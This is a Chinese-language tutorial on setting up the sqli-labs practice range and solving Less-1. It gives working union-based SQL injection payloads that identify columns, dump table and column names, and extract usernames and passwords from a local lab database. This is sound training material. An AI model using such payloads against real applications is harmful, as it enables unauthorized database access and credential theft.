Sqli

Sqli-labs-master靶场安装

1、将下载好的sqli-labs-master压缩包解压到phpstudy的网站根目录中（可以适当缩短文件名用来方便访问）

 2、修改sql-connections文件夹中的配置文件db-creds.inc，将用户名和密码改为自己PHPstudy中mysql数据库的用户名和密码。

3、在浏览器中输入127.0.0.1/sqli-labs(此处sqli-labs为自己设置的文件夹名称)访问sqli-labs靶场并点击Setup/reset Database for labs创建数据库。

Less-1闯关步骤

安装好靶机就可以点击下方的题目开始闯关了

 1、进入less-1

2、尝试输入?id=1' and '1'='1回显正常说明是字符型注入

3、依次输入?id=1' order by (1,2,3,4)--+，在输入4时出现报错，说明字段数为3

 4、输入?id=-1' union select 1,2,3--+判断回显位（其中的-1是不存在的值，用以使后方代码union select 1,2,3执行）

 5、输入?id=-1' union select 1,database(),3--+爆出数据库名

 6、输入构造好的sql语句?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+爆出表名

 7、输入?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+爆出users表的字段

8、输入?id=-1' union select 1,group_concat(username,0x2f,password),3 from users--+爆出username和password的字段值，并以/符号隔开。（0x2f为十六进制ASCII码）